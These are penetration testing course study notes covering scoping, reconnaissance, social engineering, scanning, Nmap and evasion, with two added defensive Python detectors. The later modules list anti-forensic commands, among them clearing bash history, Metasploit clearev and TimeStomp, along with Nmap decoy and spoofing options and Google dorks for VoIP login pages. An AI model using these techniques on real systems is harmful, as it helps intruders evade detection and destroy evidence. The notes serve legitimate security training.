Pentest-16th Dec 2024

Module 1

1. Governance, Risk, and Compliance

- Governance: Defines the policies and frameworks for managing an organization's security.
- Risk: The likelihood of a threat exploiting a vulnerability. Formula: Risk = Threat x Vulnerability.
- Compliance: Adherence to legal, regulatory, or organizational standards (e.g., PCI DSS, GDPR, HIPAA).

Penetration Testing Process

- Steps in PenTesting:
  1. Planning and Scoping: Outlining objectives and constraints.
  2. Reconnaissance: Gathering intelligence about the target.
  3. Scanning: Identifying live hosts, services, and vulnerabilities.
  4. Gaining Access: Exploiting vulnerabilities.
  5. Maintaining Access: Ensuring persistent access.
  6. Covering Tracks: Removing evidence of intrusion.
  7. Analysis and Reporting: Summarizing findings and providing remediation steps.

Pentesting Standards and Frameworks

- OWASP (Open Web Application Security Project): Focuses on web application security.
- NIST (National Institute of Standards and Technology): Provides cybersecurity frameworks and guidelines.
- OSSTMM (Open Source Security Testing Methodology Manual): Methodologies for comprehensive security testing.
- PTES (Penetration Testing Execution Standard): Structured steps for conducting a PenTest.
- MITRE ATT&CK:
  - Adversarial Tactics, Techniques, and Common Knowledge.
  - Categories (tactics) include Initial Access, Persistence, Credential Access, etc.

Key Compliance Requirements

- PCI DSS (Payment Card Industry Data Security Standard):
  - Protects credit card data through secure systems and practices.
  - Requires vulnerability monitoring, strong access controls, and routine testing.
- GDPR (General Data Protection Regulation):
  - Data privacy framework for EU residents.
  - Requires consent for data use, limits data collection, and mandates breach reporting within 72 hours.
- HIPAA (Health Insurance Portability and Accountability Act): Governs the security of healthcare data.

Key Databases

- CVE (Common Vulnerabilities and Exposures):
  - A list of publicly disclosed vulnerabilities.
  - Includes specific product vulnerabilities cataloged by name and description.
- CWE (Common Weakness Enumeration):
  - A database of software-related weaknesses maintained by MITRE.

2. Professionalism and Ethics

- Validation of the Team:
  - PenTesters should provide credentials (e.g., certifications), pass background checks, and have a clean legal history.
- Confidentiality:
  - Commitment to protecting proprietary and sensitive information during testing.
- Legal Considerations:
  - Draft contracts with clear terms.
  - Address legal conflicts and scenarios before testing.

3. Control Types

- Administrative Controls: Policies, procedures, and guidelines (e.g., least privilege).
- Physical Controls: Locks, cameras, and access control.
- Technical Controls: Firewalls, encryption, multi-factor authentication.

4. PenTesting Tools

- Reconnaissance:
  - Shodan: Search engine for Internet-connected devices.
  - theHarvester: Collects emails, subdomains, and metadata.
  - Recon-ng: Framework for web reconnaissance.
- Vulnerability Scanning:
  - Nessus: Comprehensive vulnerability assessment tool.
  - Nikto: Web server vulnerability scanner.
- Exploitation:
  - Metasploit: Exploit development framework.
- Reporting:
  - Tools to generate comprehensive reports for technical and non-technical stakeholders.

5. Exam-Ready Definitions

1. Risk Management: Process of identifying, analyzing, and mitigating risks.
2. Principle of Least Privilege: Users should only have the access necessary to perform their job.
3. Threat: A potential cause of an unwanted event (e.g., malware, natural disaster).
4. Vulnerability: A weakness in a system that could be exploited.
5. Exploit: A method to take advantage of a vulnerability.

Module 2

1. Project Scope and Requirements

Defining the Scope
- Project Scope:
  - Defines what is included/excluded during testing.
  - Ensures cost-effectiveness and clear objectives.
- In-Scope Assets:
  - Examples: IP addresses, domains, APIs, SSIDs, applications.
- Testing Environments:
  - LAN, WLAN, cloud resources (SaaS, IaaS, PaaS).
  - Physical vs. off-site locations (internal vs. external assets).

Requirements Gathering
- Testing Details:
  - Number of pages to test in web applications.
  - Roles and permissions to evaluate.
  - Cloud-specific requirements, such as proper authorization from providers.
- Restrictions:
  - Compliance with laws regulating tools, methods, or technologies.
  - Export control considerations for specific countries.

2. Rules of Engagement

Key Components
- Stakeholder Communication:
  - Clear and open communication to define objectives and address ambiguities.
- Timeline and Time Management:
  - Estimation of and adherence to project deadlines.
  - Avoid distractions and ensure timely updates.

Types and Strategies
- Assessment Types:
  - Compliance-Based: Ensuring regulatory adherence.
  - Red Team/Blue Team-Based: Simulated adversarial testing.
  - Goal-Based/Objective-Based: Testing focused on specific business objectives.
- Assessment Strategies:
  - Unknown Environment: Black-box testing.
  - Partially Known Environment: Gray-box testing.
  - Known Environment: White-box testing.

Validation
- Scope Validation:
  - Confirm backups and recovery procedures.
  - Review in-scope assets, restrictions, and legal considerations.

3. Legal and Confidentiality Considerations

Confidentiality Laws
- Examples of laws ensuring data confidentiality:
  - Gramm-Leach-Bliley Act (GLBA): Financial data protection.
  - Driver's Privacy Protection Act: Safeguarding driver information.
  - HIPAA: Securing healthcare-related data.

Nondisclosure Agreements (NDAs)
- Required to protect proprietary and sensitive information during testing.

Authorization to Attack
- Key Documentation:
  - Names of authorized PenTesting entities.
  - Specific networks, hosts, and applications included in scope.
  - Duration of authorization and proper data handling techniques.

4. Contracts and Agreements

Master Service Agreement (MSA)
- Governs all future engagements with the client.
- Covers:
  - Project scope.
  - Licensing or permits.
  - Insurance requirements.
  - Unforeseen additional costs.

Statement of Work (SOW)
- Defines expectations for a specific project.
- Includes:
  - Deliverables.
  - Responsibilities.
  - Payment milestones and schedules.

Service-Level Agreement (SLA)
- Outlines expected service levels and measurement metrics.
- Includes:
  - Security access controls.
  - Confidential data handling requirements.
  - Remedies or penalties for non-compliance.

5. Environmental Considerations
- Physical Locations:
  - On-site vs. off-site.
  - First-party vs. third-party hosting considerations.
- Legal Restrictions:
  - Laws impacting tools, technologies, or PenTesting methods.
  - Export controls regulating the transfer of tools or techniques.

Module 3

1. Footprinting and Reconnaissance

Definition and Objectives
- Footprinting: Gathering detailed information about the target system or organization.
- Reconnaissance:
  - Passive: Collecting data without directly interacting with the target (e.g., social media, press releases).
  - Active: Direct interaction with the target to gather details (e.g., DNS queries).

Purpose:
- Understand the business operations and technical environment of the target.
- Identify potential attack vectors.

2. Techniques and Tools

General Reconnaissance Techniques
- Social Media Scraping: Gathering employee information, behaviors, and job roles.
- Job Boards: Analyzing job descriptions for insights into the technologies used.
- DNS Information:
  - Types of records: MX (Mail Exchange), NS (Name Server), SRV (Service).

Public Source Code Repositories
- Platforms like GitHub, Bitbucket, and SourceForge.
- Risks include:
  - Exposure of private files, sensitive comments, or infrastructure details.
  - Potential for code modifications leading to exploitation.

Google Hacking
- Uses advanced search operators to find exposed or vulnerable resources:
  - site: Restricts results to a specific domain.
  - filetype: Searches for specific file types (e.g., .pdf, .doc).
  - inurl: Searches URLs for keywords.
- Combine operators for targeted searches.

Archived Websites
- Tools and techniques:
  - Wayback Machine: Access old versions of websites.
  - Cache Search: View recently cached versions of sites.
  - Browser Extensions: For viewing cached pages.

Image and Metadata Searches
- Tools:
  - Reverse Image Search: Google, TinEye, Bing.
  - Google Alerts: Monitors web changes and sends notifications.

3. Website Information

Vulnerability Identification
- Exploitable vulnerabilities:
  - XSS (Cross-Site Scripting), SQL Injection, Web Cache Poisoning.
- Tools:
  - Nmap, Metasploit, DirBuster.
- robots.txt:
  - Used to restrict web crawlers.
  - Poorly configured files can reveal sensitive directories.

SSL/TLS Certificates
- Use in reconnaissance:
  - Identify SAN (Subject Alternative Name) entries that list additional subdomains.
  - Certificate Transparency (CT) logs: Public records of issued certificates reveal outdated or unused subdomains.
- Validation:
  - CRL (Certificate Revocation List): Checks for revoked certificates.
  - OCSP (Online Certificate Status Protocol): Real-time certificate status validation.

4. Open-Source Intelligence (OSINT) Tools

Overview
- Used to gather information discreetly without triggering alerts.
- Collects publicly available information.

Metadata Collection
- Metagoofil:
  - Extracts metadata (e.g., author, software versions) from documents on target websites.
  - Command examples:
    - -d comptia.org: Scans for documents on the domain.
    - -t pdf: Searches for PDFs.
- FOCA:
  - GUI-based metadata extractor.
  - Works with file types like PDFs, Office documents, SVGs.
  - Extractable metadata: Usernames, OS versions, plaintext passwords.

Automation Tools
- theHarvester:
  - Collects subdomains, employee names, email addresses, open ports, and service banners.
  - Data sources include search engines (Google, Bing), social media, and certificates.
- Recon-ng:
  - Modular framework for OSINT.
  - Features:
    - Whois Queries: Identifies key contacts.
    - DNS Enumeration: Maps subdomains.
    - Social Media Profile Linking.
    - Breach Check: Finds whether accounts are part of known breaches.

Graphical Tools
- Maltego:
  - Visualization of OSINT data in graphs.
  - Uses "transforms" to connect entities (e.g., individuals, emails, addresses).
  - Identifies relationships between data points.

Device and IoT Enumeration
- Shodan:
  - IoT-specific search engine.
  - Finds publicly exposed devices like security cameras and industrial control systems.
  - Useful for identifying an organization's perimeter defenses and IoT device vulnerabilities.

5. Use Cases for Tools
- Nslookup/Dig: DNS queries to map domains and subdomains.
- Whois: Identifies domain ownership and administrative contacts.
- Metasploit: Exploits vulnerabilities based on gathered data.
- DirBuster: Discovers hidden directories in web applications.
- Wayback Machine: Retrieves previous versions of a target website.
- Google Alerts: Tracks web changes related to the target.

6. Practical Takeaways
- Importance of Reconnaissance:
  - Foundational step for a successful PenTest.
  - Provides actionable insights to identify weaknesses and potential entry points.
- Key Intelligence:
  - Subdomains, employee roles, infrastructure details, and exposed data.
- Critical Skills:
  - Combining OSINT tools and manual research for comprehensive data gathering.

Module 4

1. Social Engineering Attacks

Definition
- Social engineering uses psychological manipulation to deceive individuals into providing confidential information or performing actions that benefit an attacker.

Key Methods
1. Pretexting:
   - Creating a believable story to gain trust and extract sensitive information.
2. Elicitation:
   - Methods include:
     - Requesting: Directly asking for information.
     - Interrogation: Pretending to be an authority figure.
     - Observation: Monitoring a target's daily routines.
     - Surveys: Collecting data informally.
3. Hoax:
   - Presenting fictitious scenarios (e.g., fake antivirus pop-ups).
4. Baiting:
   - Leaving infected USB drives for victims to find and use.
5. Phishing:
   - Luring victims through deceptive emails to steal credentials.
6. Spearphishing:
   - Targeted phishing attack tailored to specific individuals.
7. Pharming:
   - Redirecting users to malicious websites disguised as legitimate ones.
8. SMiShing:
   - SMS-based phishing attacks.
9. Vishing:
   - Voice phishing through VoIP or phone calls.
10. USB Drop Key Attack:
    - Preloading USB drives with malware and planting them in accessible areas.

2. Advanced Social Engineering Techniques

Tactics to Influence Victims
- Authority: Leveraging positions of power to compel compliance.
- Scarcity: Creating a sense of urgency.
- Fear: Using intimidation to force action.
- Social Proof: Encouraging actions by showing others' behavior.
- Likeness: Building rapport by mimicking behavior or attitudes.

Redirection and Watering Hole Attacks
- Typosquatting:
  - Exploiting user mistakes in typing URLs to redirect them to malicious websites.
- Watering Hole Attacks:
  - Infecting websites frequently visited by the target to distribute malware.
- Supply Chain Attacks:
  - Infecting partner or contractor systems to compromise the target organization.

3. Physical Attacks

Assessment Tasks
- Taking photos of restricted areas.
- Stealing devices or sensitive documents.
- Testing physical security controls like gates, fences, and mantraps.

Attack Techniques
1. RFID Badge Cloning:
   - Duplicating access card data using RFID writers.
2. Tailgating:
   - Following an authorized individual into a restricted area without their knowledge.
3. Piggybacking:
   - Gaining access by being knowingly allowed entry by an authorized individual.
4. Dumpster Diving:
   - Retrieving sensitive information from discarded documents or storage devices.
5. Shoulder Surfing:
   - Observing targets to gain actionable insights (e.g., screen activity or passwords).

4. Social Engineering Toolkit (SET)

Overview
- A Python-based framework for social engineering PenTests.
- Compatible with Linux, Unix, Windows, and Kali Linux.

Features
- Attacking websites.
- Mass mailing campaigns.
- Spearphishing attack creation.

Spoofing Techniques
1. VoIP Call Spoofing:
   - Making calls appear to come from trusted sources.
   - Can be achieved using apps or tools like Asterisk.
2. Voicemail Exploitation:
   - Using spoofed numbers to access voicemail systems.
   - Default passwords can be a vulnerability.

5. Practical Physical Security Exploits

1. Lock Bypassing:
   - Circumventing combination locks, access cards, or biometric scanners.
2. Scaling Fences:
   - Identifying and exploiting weak points in physical barriers.
3. Motion Detection Avoidance:
   - Finding blind spots in motion sensors or cameras.

6. Tools for Social Engineering and Reconnaissance

SET (Social Engineering Toolkit):
- Helps simulate and execute phishing, baiting, and pretexting attacks.
- Guides users through required inputs like IPs, ports, and URLs.

Google Hacking for VoIP:
- Useful search queries:
  - Cisco CallManager: inurl:"ccmuser/logon.asp"
  - D-Link Phones: intitle:"D-Link DPH" "web login setting"
  - Grandstream Phones: intitle:"Grandstream Device Configuration" password

7. Key Attack Scenarios

- Watering Hole Attack:
  - Infecting trusted websites frequently accessed by the target.
- Supply Chain Attack:
  - Exploiting vulnerabilities in the target's vendors or partners.

Module 5

1. Vulnerability Scanning Process

Understanding Vulnerabilities
- Vulnerability Lifecycle:
  - Discover: Recognize potential vulnerabilities.
  - Coordinate: Identify and communicate exploitation possibilities.
  - Mitigate: Vendors design and implement fixes (patches).
  - Manage: Apply and maintain patches.
  - Document: Record findings and actions for reference.

Zero-Day Vulnerabilities
- Exploits vulnerabilities unknown to vendors.
- Risk Gap: Time between patch release and application.

2. Reconnaissance and Scanning

Key Activities
1. Banner Grabbing:
   - Collect metadata about network hosts and services.
   - Tools: Nmap (nmap -sV <target IP> -p <port>), Netcat, Curl.
2. Network Mapping:
   - Identifies:
     - MAC and IP addresses.
     - Services, devices, subnets, and topology.
   - Output helps in choosing attack strategies.
3. Scanning:
   - General Purpose Scanners:
     - OpenVAS: Free, open-source tool.
     - Nessus: Commercially supported scanner.
     - Nmap: Network discovery and vulnerability scanning.
   - Scanning Goals:
     - Detect weak encryption/authentication protocols.
     - Identify compliance violations.
   - Types of Scans:
     - Nonintrusive: Passive reporting of vulnerabilities.
     - Intrusive: Actively tests for exploitation but risks system damage.

3. Detecting Defenses

Load Balancers
- Devices that distribute traffic to optimize performance.
- Detection tools: lbd (Kali Linux).

Firewalls
1. Web Application Firewall (WAF):
   - Guards against XSS and SQL injection attacks.
   - Indicators:
     - Cookies set in HTTP headers.
     - Header alterations.
     - Response titles like <title>myDefender blocked your request</title>.
2. Testing Firewalls:
   - Use custom packets to test:
     - Permit Rules: Allowed packets.
     - Deny Rules: Blocked packets.
   - Firewalking: Combines traceroute and port scanning to map internal network details.

Antivirus Evasion
- Techniques:
  - Metamorphic Malware: Changes structure to evade signature detection.
  - Obfuscation: Using tools like ObfuscatedEmpire.
  - Fileless Malware: Executes via OS-level processes, avoiding detection.

4. Advanced Tools and Techniques

OpenVAS and Censys
- OpenVAS: Lists vulnerabilities with CVSS scores and CVE numbers.
- Censys: Analyzes attack surfaces and identifies exposed services and ports.

Packet Crafting
- Custom packets used to:
  - Test firewall rules.
  - Evade intrusion detection systems (IDS).
  - Cause denial of service (DoS).
- Tools: Yersinia, Bit-Twist.

Web Application Scanning
1. Tools:
   - OWASP ZAP, Metasploit Pro, Arachni, Skipfish, Grabber, Wapiti.
2. Common Tests:
   - SQL Injection: Directly scan SQL servers (TCP 1433, UDP 1434).
   - Vulnerabilities: On standard (TCP 80, 443) and non-standard ports.

SQLmap
- Open-source tool for testing SQL injection vulnerabilities.

SSL/TLS Vulnerabilities
- Examples:
  - Logjam: Weakens encryption strength.
  - FREAK: Exploits RSA export-grade keys.
  - POODLE: Targets SSL 3.0 padding.

Nikto
- Detects:
  - Missing security headers (e.g., X-Frame-Options for clickjacking).
  - Dangerous files and CGI scripts.

5. Planning Vulnerability Scans

Considerations
1. Scope:
   - Define timeframes, bandwidth limits, and system fragility.
2. Post-Scan Validation:
   - Verify vulnerabilities through exploitation.
   - Tools: Metasploit, manual testing.

6. Practical Vulnerability Analysis

1. Testing Databases:
   - Focus on private networks or misconfigured servers.
   - Use SQL commands to test for illegal inputs.
2. SSL/TLS Testing:
   - Check for deprecated cryptographic standards.
3. Automated Tools:
   - Use GitHub scripts (e.g., Wafw00f, WAFNinja) for advanced scans.

Module 6

1. Vulnerability Scanning and Reconnaissance

Discovery Scans
- Definition: A ping sweep to identify live hosts on a network.
- Techniques:
  - TCP SYN Ping, TCP ACK Ping.
  - UDP Ping, ARP Scan, IP Protocol Ping.

Port Scanning
- Identifies open and listening ports on live hosts.
  - Examples: Port 25 (SMTP), Port 53 (DNS), Port 80 (HTTP).
- Types of Scans:
  - Full Scan (TCP Connect):
    - Uses a complete three-way handshake.
    - Produces detailed results but is easily detected.
  - Stealth Scans:
    - Avoid detection by skipping the full handshake.
    - Types: TCP SYN (half-open), FIN, NULL, XMAS Tree.
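Seen from the defender's side, the difference between a connect scan, a half-open SYN scan and the FIN/NULL/XMAS probes (Nmap's -sF, -sN and -sX) is visible in the TCP flags a host sends and in whether it ever completes the handshake. The following Python is an added example, not code from the original notes, that classifies sources from constructed, simplified packet-log lines; the log format and the five-port threshold are assumptions made for the example.

```python
"""Classify scan behaviour per source from simplified TCP packet-log lines.

Added example, not part of the original notes. Each constructed line is
    <seq> <src_ip> <dst_ip> <dst_port> <flags>
where <flags> lists the TCP flags set on that packet ("S", "SA", "A", "R",
"F", "FPU") or "-" for a packet with no flags (a NULL probe). Real firewall
or IDS logs use other layouts; only parse_log() would need to change.
"""
from collections import defaultdict

# Constructed sample: 10.0.0.5 completes one handshake (ordinary client),
# 10.0.0.9 sends lone SYNs to six ports and never completes (half-open),
# 10.0.0.7 sends FIN, NULL and XMAS probes. 10.0.0.20 is the scanned host.
SAMPLE_LOG = """\
1 10.0.0.5 10.0.0.20 80 S
2 10.0.0.20 10.0.0.5 80 SA
3 10.0.0.5 10.0.0.20 80 A
4 10.0.0.9 10.0.0.20 22 S
5 10.0.0.20 10.0.0.9 22 SA
6 10.0.0.9 10.0.0.20 22 R
7 10.0.0.9 10.0.0.20 25 S
8 10.0.0.9 10.0.0.20 53 S
9 10.0.0.9 10.0.0.20 80 S
10 10.0.0.9 10.0.0.20 443 S
11 10.0.0.9 10.0.0.20 445 S
12 10.0.0.7 10.0.0.20 21 F
13 10.0.0.7 10.0.0.20 23 -
14 10.0.0.7 10.0.0.20 110 FPU
"""

# Flag combinations that only make sense as probes: Nmap's -sF, -sN and -sX.
STEALTH_PROBES = {"F": "FIN", "-": "NULL", "FPU": "XMAS"}


def parse_log(text):
    """Return (src, dst, port, flagset) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or not parts[3].isdigit():
            continue
        _seq, src, dst, port, flags = parts
        flagset = frozenset() if flags == "-" else frozenset(flags)
        records.append((src, dst, int(port), flagset))
    return records


def analyze(records, port_threshold=5):
    """Classify each source; returns {src: finding} for flagged sources only.

    A source is a SYN (half-open) scanner when it sent lone SYNs to at
    least port_threshold ports without ever sending the bare ACK that
    completes the handshake; a connect scanner when it completed that
    many handshakes; a stealth prober when any FIN/NULL/XMAS packet is seen.
    """
    syn_only = defaultdict(set)    # src -> ports that got a lone SYN
    completed = defaultdict(set)   # src -> ports where src sent a bare ACK
    stealth = defaultdict(list)    # src -> [(port, probe type), ...]
    for src, _dst, port, flags in records:
        if flags == frozenset("S"):
            syn_only[src].add(port)
        elif flags == frozenset("A"):
            completed[src].add(port)
        key = "".join(sorted(flags)) if flags else "-"
        if key in STEALTH_PROBES:
            stealth[src].append((port, STEALTH_PROBES[key]))

    findings = {}
    for src in set(syn_only) | set(completed) | set(stealth):
        if stealth[src]:
            findings[src] = {"kind": "stealth_probe",
                             "ports": sorted(p for p, _ in stealth[src]),
                             "probes": sorted({t for _, t in stealth[src]})}
            continue
        half_open = syn_only[src] - completed[src]
        if len(half_open) >= port_threshold:
            findings[src] = {"kind": "syn_scan", "ports": sorted(half_open)}
        elif len(completed[src]) >= port_threshold:
            findings[src] = {"kind": "connect_scan", "ports": sorted(completed[src])}
    return findings


if __name__ == "__main__":
    for src, finding in sorted(analyze(parse_log(SAMPLE_LOG)).items()):
        print(src, finding)
```

The same classifier works on any log that exposes per-packet TCP flags; a connect scan shows up as many completed handshakes from one source, which the half-open check deliberately ignores.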
Web Application Scanning
- Includes crawling, scraping, and discovering assets.
- Credentialed Scan: Uses credentials for deeper insights.
- Non-Credentialed Scan: Limited access, finds only surface vulnerabilities.
- Tools:
  - Acunetix, Qualys, Netsparker (commercial).
  - Open-source scanners in Kali Linux.

2. Automated Vulnerability Scanning

Techniques
- Static Application Security Testing (SAST):
  - Early lifecycle testing of code for vulnerabilities.
- Dynamic Application Security Testing (DAST):
  - Post-deployment testing of the running application for vulnerabilities.
- SCAP (Security Content Automation Protocol):
  - A US standard for ensuring compliance and monitoring vulnerabilities.

Benefits
- Continuously updates vulnerability databases.
- Reduces manual effort and improves consistency.

3. Network Traffic Analysis

Sniffing Traffic
- Tools: Wireshark for passive traffic capture.
- Captured Data:
  - Cleartext data: Credentials, messages, hostnames.
  - Encrypted data: Source/destination addresses, SSIDs, handshakes.

MAC and ARP Analysis
- Tools: Nessus, Nmap (nmap -PR -sn <target>), Arping (Kali Linux).
- Applications:
  - Discover hosts.
  - Launch ARP poisoning attacks.

4. Wireless Network Security

Wardriving
- Searching for open wireless access points (WAPs) using tools:
  - Aircrack-ng, Kismet, Wifite.
- Use packet analysis tools to gather and save WAP data.

WiGLE (Wireless Geographic Logging Engine)
- Purpose: OSINT tool for mapping WAPs.
- Features:
  - Enter location and date ranges.
  - Map access points and analyze their data.

Antenna Types for PenTesting
- Directional: Focused signal in one direction.
- Omni-Directional: Broadcasts in all directions.
- Parabolic: Focused beam like a laser.

Signal Amplification
- Antenna gain is measured in dBi (decibels relative to an isotropic radiator).
- Improves the Signal-to-Noise Ratio (SNR) for better penetration test results.

5. Evaluating APIs

Importance
- APIs exchange data between systems securely.
- Testing targets:
  - Exposed API keys.
  - Vulnerabilities in API interactions.

6. Vulnerability Scanning Tools

1. Nessus:
   - Scans enterprise or home networks.
   - Supports policy creation for future scans.
   - Validates network segmentation (e.g., VLANs, subnets).
2. SQLmap:
   - Finds and exploits SQL injection vulnerabilities.
3. Nikto:
   - Tests web servers for:
     - Missing headers (e.g., X-Frame-Options for clickjacking).
     - Dangerous files or CGIs.

7. Wireless Access Point (WAP) Security

Testing Objectives
- Discover open or unsecured WAPs.
- Evaluate access point vulnerabilities to prevent unauthorized access.

Key Findings
- Weak encryption or default configurations.
- Unauthorized access opportunities.

8. Practical Considerations

Full vs. Stealth Scans
- Full scans are thorough but noisy.
- Stealth scans minimize detection risk but may provide less detail.

Segmentation
- Network segmentation isolates systems to minimize lateral movement.
- Ensures compliance and reduces the attack surface.

Module 7

1. Nmap Scanning and Scripting

Capabilities of Nmap
- Key Features:
  - Host and service discovery.
  - OS fingerprinting.
  - Vulnerable host detection.
  - MAC address gathering.
- Scanning Performance:
  - Use timing templates: -T0 (slowest) to -T5 (fastest).
  - Adjust timing on rate-limited networks to avoid detection.

TCP and UDP Scans
- TCP Scans:
  - TCP ACK Scan: Sends ACK-flagged packets to bypass firewall filtering.
  - Full Scan (TCP Connect): Establishes a full handshake but is noisy.
  - Christmas Tree Scan: Uses the FIN, PSH, and URG flags.
- UDP Scans:
  - Slower, and responses are harder to detect.
  - Often skipped in favor of TCP scans.

Nmap Scripting Engine (NSE)
- Purpose:
  - Automates tasks like malware detection, network discovery, and vulnerability assessment.
- Categories:
  - Malware: Detects Trojans and backdoors.
  - Discovery: Identifies hosts and services.
  - Vulnerabilities: Exploitation commands.
- Usage:
  - Single script: nmap --script <script-name>.
  - Multiple scripts: Use commas or wildcards to specify scripts or categories.

2. Network Enumeration

Mapping the Network
- Discovery Methods:
  - Ping Scans: ICMP echo requests.
  - TCP Scans: Open ports and services.
  - OS Footprinting: Detect OS types.
- Host Discovery Options:
  - Skip discovery: -Pn.
  - Network discovery only: -sn.
  - Script-only without scans: Combine -Pn and -sn.

OS Fingerprinting
- Uses active or passive methods:
  - Active: Sends probes and analyzes responses.
  - Passive: Captures packets with sniffing tools like Wireshark.
- Key indicators:
  - DF bit, Window Size (WS), and Time to Live (TTL) values.

3. Analyzing Scans

Output Formats
- Interactive: Default, human-readable.
- XML (-oX): Flexible, machine-readable.
- Grepable (-oG): For command-line parsing.
- Normal (-oN): Saves scan results to a text file.

Zenmap
- GUI companion for Nmap.
- Visualizes network topology and assists in attack planning.

4. DNS and Web Server Analysis

DNS Footprinting
- Reveals additional targets and network structure.
- Vulnerabilities:
  - Zone Transfers: Obtain resource records (e.g., Type A, MX).
  - DNS Cache Poisoning: Corrupts recursive server caches.

Web Server Testing
- Methods:
  - Manually inspect source code for comments or exposed data.
  - Review logs for unauthorized access.
  - Intercept traffic using a proxy.

Burp Suite
- Features:
  - Acts as a local proxy to capture HTTP/HTTPS traffic.
  - Identifies vulnerabilities (e.g., weak authentication, cryptographic flaws).
- Dashboard:
  - Lists details of discovered vulnerabilities for deeper analysis.

5. Vulnerability Testing

Key Scanning Techniques
- Service Detection: Use scripts like dns-service-discovery.
- Zone Transfer Exploits:
  - Use Nmap scripts to request and analyze zone records.
  - dns-zone-transfer for exposed records.
- Dynamic DNS Updates:
  - Test updates without authentication using scripts like dns-update.

Web Application Scanning
- Use proxies and web crawlers to intercept traffic and analyze vulnerabilities.

6. Questions to Address During Reconnaissance

1. Who are the key targets?
   - Identify hosts and devices worth pursuing.
2. What is the target's location?
   - Establish proximity and accessibility.
3. What is the goal?
   - Define specific objectives for data extraction or exploitation.
4. When and how to attack?
   - Plan timing and methods to avoid detection.

7. Practical Insights

Nmap Utility
- Flexible and comprehensive for PenTesting tasks.
- Supports extensive customization via scripts and output formats.

Zenmap
- Enhances understanding of network environments through visual mapping.
- Aids in strategizing attacks and testing results.

DNS Risks
- Misconfigurations in zone files or caching can expose critical information.
- Use scripts like dns-zone-transfer or dns-update to evaluate vulnerabilities.

Module 8

1. Evading Detection

Flying Under the Radar
- Stealth Techniques with Nmap:
  - Fragmentation: Break probes into smaller packets.
  - Randomizing Hosts: Change the scanning order.
  - Decoys:
    - Generate fake packets to disguise the attacker's real address.
    - Command: nmap -D decoy1,decoy2,... <target> or nmap -D RND:3 <target>.
  - Fake Source Addresses:
    - Spoof source IP or MAC addresses.
    - Command: nmap --spoof-mac <0|vendor name|MAC address> (0 picks a random address).
- Slowing Scans:
  - Adjust timing with -T options (e.g., -T0 for maximum stealth).
  - Avoid IDS detection by reducing scan aggressiveness.

Bypassing Network Access Control (NAC)

- Technique:
  - Gain access via an already authenticated device.
  - Use rogue WAPs to relay malicious traffic.

Living off the Land (LotL)
- Definition:
  - Attacks that leverage built-in OS tools or admin utilities, avoiding external malware.
- Examples:
  - PowerShell (PS).
  - Windows Management Instrumentation (WMI).
  - Mimikatz (credential theft).
  - VBScript.

2. Covering Tracks

Log and Entry Manipulation
- Clearing Logs:
  - Windows: Use Metasploit's clearev or clear specific logs via the CLI.
  - Linux: Commands to delete specific logs (e.g., echo "" > ~/.bash_history).
- Modifying Logs:
  - Alter log entries to mislead investigators.
  - Example: Modify login events in the Windows Security log.
- Timestamp Alteration:
  - Use tools like TimeStomp in Metasploit to change a file's MACE (Modified, Accessed, Created, Entry modified) timestamps.
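On the forensic side, timestamp alteration of this kind is often detectable in the MFT: the tool rewrites the $STANDARD_INFORMATION (SI) timestamps that Explorer and dir display, but not the $FILE_NAME (FN) copies, and it typically writes whole-second values where NTFS stores 100-ns ticks. The following Python is an added example, not code from the original notes, that applies those two checks to constructed MFT-style records; the record layout is an assumption, and file copies or moves between volumes can also produce SI/FN mismatches, so hits are leads to verify rather than proof.

```python
"""Flag timestomping indicators in constructed MFT-style timestamp records.

Added example, not part of the original notes. Each record carries the
$STANDARD_INFORMATION (si_*) and $FILE_NAME (fn_*) created/modified times
as ISO-like strings with up to seven fractional digits (NTFS keeps 100-ns
ticks). The record layout is an assumption made for this example.
"""
from datetime import datetime

SAMPLE_RECORDS = [
    # Constructed: an untouched document; SI and FN created times agree and
    # both carry sub-second precision.
    {"name": "report.docx",
     "si_created": "2024-12-10T09:15:22.1234567",
     "si_modified": "2024-12-12T14:02:10.9876543",
     "fn_created": "2024-12-10T09:15:22.1234567",
     "fn_modified": "2024-12-10T09:15:22.1234567"},
    # Constructed: SI times backdated to whole seconds in 2019, while FN
    # still records the real creation on the day of the intrusion.
    {"name": "svchost.exe",
     "si_created": "2019-03-19T04:37:00.0000000",
     "si_modified": "2019-03-19T04:37:00.0000000",
     "fn_created": "2024-12-16T22:41:05.5553331",
     "fn_modified": "2024-12-16T22:41:05.5553331"},
]


def parse_ts(value):
    """Split an ISO-like timestamp into (datetime to the second, 100-ns ticks)."""
    base, _, frac = value.partition(".")
    whole = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S")
    ticks = int((frac or "0").ljust(7, "0")[:7])
    return whole, ticks


def check_record(rec):
    """Return the list of indicator names that fire for one record."""
    si_created = parse_ts(rec["si_created"])
    si_modified = parse_ts(rec["si_modified"])
    fn_created = parse_ts(rec["fn_created"])
    findings = []
    # Indicator 1: SI times rounded to whole seconds while FN keeps ticks.
    # Tools that set times with second granularity leave zero fractional
    # ticks; timestamps written by NTFS itself rarely land on exactly zero.
    if si_created[1] == 0 and si_modified[1] == 0 and fn_created[1] != 0:
        findings.append("si_whole_second")
    # Indicator 2: SI claims the file existed before its MFT entry was made.
    # FN created is set by the file system and is not reachable through the
    # ordinary timestamp APIs, so SI earlier than FN is worth a closer look.
    if si_created < fn_created:          # tuple compare: (datetime, ticks)
        findings.append("si_created_before_fn_created")
    return findings


def scan_records(records):
    """Map file name -> indicators for every record that has at least one."""
    report = {}
    for rec in records:
        hits = check_record(rec)
        if hits:
            report[rec["name"]] = hits
    return report
```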
Data Shredding
- Commands:
  - Linux: shred for overwriting files.
  - Windows: Overwrite a volume with format d: /fs:NTFS /p:1.

3. Concealing Information

Steganography
- Definition:
  - Embedding hidden data within carrier files (images, audio, text).
- Tools:
  - Steghide: Hides payloads in images/audio.
  - Snow: Hides data in text whitespace.
  - Coagula/Sonic Visualiser:
    - Convert text into an image, then embed it into a .wav file.
    - Reveal the text with audio spectrogram analysis.

NTFS Alternate Data Streams
- Allow hidden data to be attached to visible files.
- Used to conceal tools or sensitive data on compromised systems.

4. Data Exfiltration

Definition
- Unauthorized transfer of data from a secure system to an external location.
- Methods:
  - Phishing or social engineering attacks.
  - Using insecure storage (e.g., USB drives).
  - Fileless malware exploiting PowerShell or cloud misconfigurations.

5. Establishing Covert Channels

Remote Management Tools
1. Secure Shell (SSH):
   - Provides encrypted remote management.
   - Nmap can detect SSH server vulnerabilities.
